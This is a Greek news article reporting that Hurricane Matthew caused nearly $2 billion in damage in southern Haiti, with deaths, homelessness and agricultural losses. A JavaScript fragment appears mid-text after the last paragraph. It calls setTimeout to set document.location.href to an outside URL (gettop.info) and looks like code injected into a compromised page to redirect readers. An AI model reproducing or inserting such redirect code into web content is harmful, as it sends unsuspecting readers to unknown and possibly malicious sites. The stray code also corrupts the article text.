Ζημιές ύψους 2 δισ. δολ. προκάλεσε ο Μάθιου στην Αϊτή

0
4

 

Καταστροφές ύψους σχεδόν 2 δισεκατομμυρίων δολαρίων προκάλεσε ο κυκλώνας Μάθιου στη νότια Αϊτή την 4η Οκτωβρίου, σύμφωνα με τον απολογισμό από τις Αρχές.

Το ύψος των ζημιών εκτιμάται πως ανέρχεται σε 124,8 δισ. γκουρντ, ή 1,89 δισ. δολάρια, όπως έδειξαν οι μελέτες που έγιναν με την υποστήριξη διεθνών χρηματοπιστωτικών οργανισμών (της Παγκόσμιας Τράπεζας και της Διαμερικανικής Τράπεζας Ανάπτυξης)

Η καταστροφή, η οποία στοίχισε τη ζωή σε 546 ανθρώπους, κατά τον πιο πρόσφατο επίσημο απολογισμό, έπληξε σκληρά την ήδη εξαιρετικά αδύναμη οικονομία της πιο φτωχής χώρας της Καραϊβικής, καθώς οι ζημιές ανέρχονται σε πάνω από το 20% του ΑΕΠ.

Η νότια Αϊτή, που θεωρείται ο σιτοβολώνας της χώρας, σαρώθηκε από τους καταστροφικούς ανέμους και καταρρακτώδεις βροχοπτώσεις.

Μόνον ο αγροτικός τομέας υπέστη ζημιές που υπολογίζονται σε σχεδόν 600 εκατομμύρια δολάρια. Και πάνω από 175.000 άνθρωποι έχασαν τα σπίτια τους, με τις καταστροφές να υπολογίζονται επίσης σε σχεδόν 600 εκατομμύρια δολάρια, σύμφωνα με τους οικονομολόγους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here